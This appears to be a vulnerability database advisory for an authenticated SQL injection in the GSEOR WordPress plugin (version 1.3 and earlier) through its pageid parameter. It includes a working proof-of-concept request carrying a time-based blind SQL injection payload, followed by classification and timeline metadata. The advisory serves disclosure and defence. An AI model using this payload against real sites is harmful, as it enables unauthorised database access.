WordPress Plugin Vulnerabilities
GSEOR <= 1.3 - Authenticated SQL Injection
Description
A pageid GET parameter of the plugin is not sanitised, escaped or validated before inserting to a SQL statement, leading to SQL injection.
Proof of Concept
GET /wp-admin/admin.php?page=gseor.php&search=1&pageid=1%20AND%20(SELECT%206449%20FROM%20(SELECT(SLEEP(5)))wwdQ) HTTP/1.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-GPC: 1 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [admin+] Connection: close
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Syed Sheeraz Ali of Codevigilant
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-08-22 (about 2 years ago)
Added
2021-08-23 (about 2 years ago)
Last Updated
2022-03-07 (about 2 years ago)